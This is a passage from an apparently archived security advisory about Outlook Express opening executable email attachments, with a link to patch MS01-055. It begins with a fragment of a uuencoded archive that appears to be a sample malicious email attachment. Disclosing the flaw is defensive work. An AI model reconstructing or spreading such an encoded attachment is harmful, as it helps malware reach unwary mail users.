	M(BRWJI4E\\HO3_>0TJ\\SX#@RWN,PUX6KRG!-I8!(1D?H\'\\A$<*>9O70VQ/Y;4

	ML3R#0VJ755*Y`F1M8CK-\\Y0#7EG.\"3L#;DR+$+<_Z%\'&:D#4VU*/WK4(<`)M

	M8?QBF<Z7]F?Q]!]O_P`TA7T`.T6SM\"A_*]2&-<CS?$N\'ENWF]8*\"3*UAE+]N

	MJ6@Y8DZIEEG^^>YN=<<:K^[+0J]9L]T]I<;\"6I#[O>A.K/7J_NIW)6N3W\\G6

	M[%N)^1A0LVGM<K\"L8-N;6:G\\\"&G?M8[1XUCT+];)>ES]@6-=HT=G:U(KWQ6T

	ML/96(1:>;SN6)!?S8CBTFE:1;8=7J[TKBL()`;=\'+@Y]3[&UE3BCWIO=S<28

	MC@9VSQ0/_NA@#XAXV_I=V\\K%.O5#>[@37[=^RW;:HEH$KNWEDND\'5]MWI6K%

	M\\\\>V/2%22\"?$GIVE73&9V8N5=-I.FO;*DA[^U+\'#0&K0:6RO<ZE6!-2.Q+JV

	MG<WL1*OWZ2RWMU\'=I7.(@\':JU2?%_&@?=O6ZOSS:MZ!.MJO`OI\\;/;K*[6+6

	M<\'P\\K1<;\\VTHVK+62(KUTFY%C7JQ2>R:W*C13<W.+?QWN_QH,E1$V?)C,M1$

	M>4SCX[#GROEVVQO:KMSTMY>A(\\I:L9L//;DYV.Z`,[NFNTW#X21KAC1M#J=R

	M,]GN7<BBY^WFJ=B+PY75?-##=!CFS=?MH1BZJQ;=9OXP%EMFD9V\'VZ#ET*,R

	MW*U:/CU.AWNMM=B^W88GM_78\'NVA=\'ZM5K;^;3#LB*\\M_VPY/;E]HT7/&5KM

	M5UJ\\.F37,;9BZHS.G>E6VCD3L9/0^MI9N)T;E00G6]6VM#5VCGDM\\UMYM>*<

	M@MJU>%6<\"ZG5B]>=<Q5K0B%[SL,5!D6[YH@[8>)W]DYC)D1%;>(T92$OA)$C

	MF`(+NQ8+,=0B;8!F4+*U:):/?\"6Q##%?;]78ZLOYI:\"A-9SEKY2VP!?=#:JM

	MK9%U\'_A:RQJ3^\\37U];$O2]]7;*F^3TIC#GHV\\*ZGVDWL4;D86][NK4[/^;;

	M7FYEYB.A?=\\Z9H^WHB]:Y]E#W`[6UC5[M+>#MA6;A5/8`TL2BT4!$FW,BFHE

	M\\H==2\\Z+E`Y#JVT6HN_D5AZ))G5?;2T3I[YW0XU.MZ.-W1?%<S&2;4L3\']2W

	M[>%9[&Q=:KL[B1;!#/0-=#CTIVM[$TG$7[;L/ZE5_E;[O^:1_H[VWP\':[[__

	M@_\\F(/]\'!/\\/4$L!`A0`%`````@`LK1Z*R<[5OQ)*```,%4``!``````````

	M`0`@`+:!`````&)A9\'1R86YC96UA;BYE;6Q02P4&``````$``0`^````=R@`

	#````

	`

	end

	

	

	This is simple not acceptable. Guaranteed there  are  generic  folk  out
	there who know nothing, and will open that  attachment  warning  out  of
	curiosity, be it that their mail client Outlook  Express  5.00  patched,
	5.5 patched, 6.00 patched.  The  current  proliferation  can  surely  be
	based on that [as well].
	

	The warning dialogue  is  just  not  good  enough  for  executable  file
	attachments. A clear safety  warning  must  follow  the  single,  simple
	\'open it\' or \'save it\' flimsy  attachment  warning.  It  is  grossly
	unfair to the clientele this vendor caters to  and  contributes  to  the
	destruction of the internet infrastructure as a whole adding  to  making
	it unsafe for everyone.
	

	Please don\'t sell the nice  little  children  shiny  bright  toys  with
	toxic parts that fall off that they can  swallow  and  then  claim  they
	ought to know better and not put it in their mouths.

SOLUTION

	Microsoft has released a patch, go to
	http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms01-055.asp

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH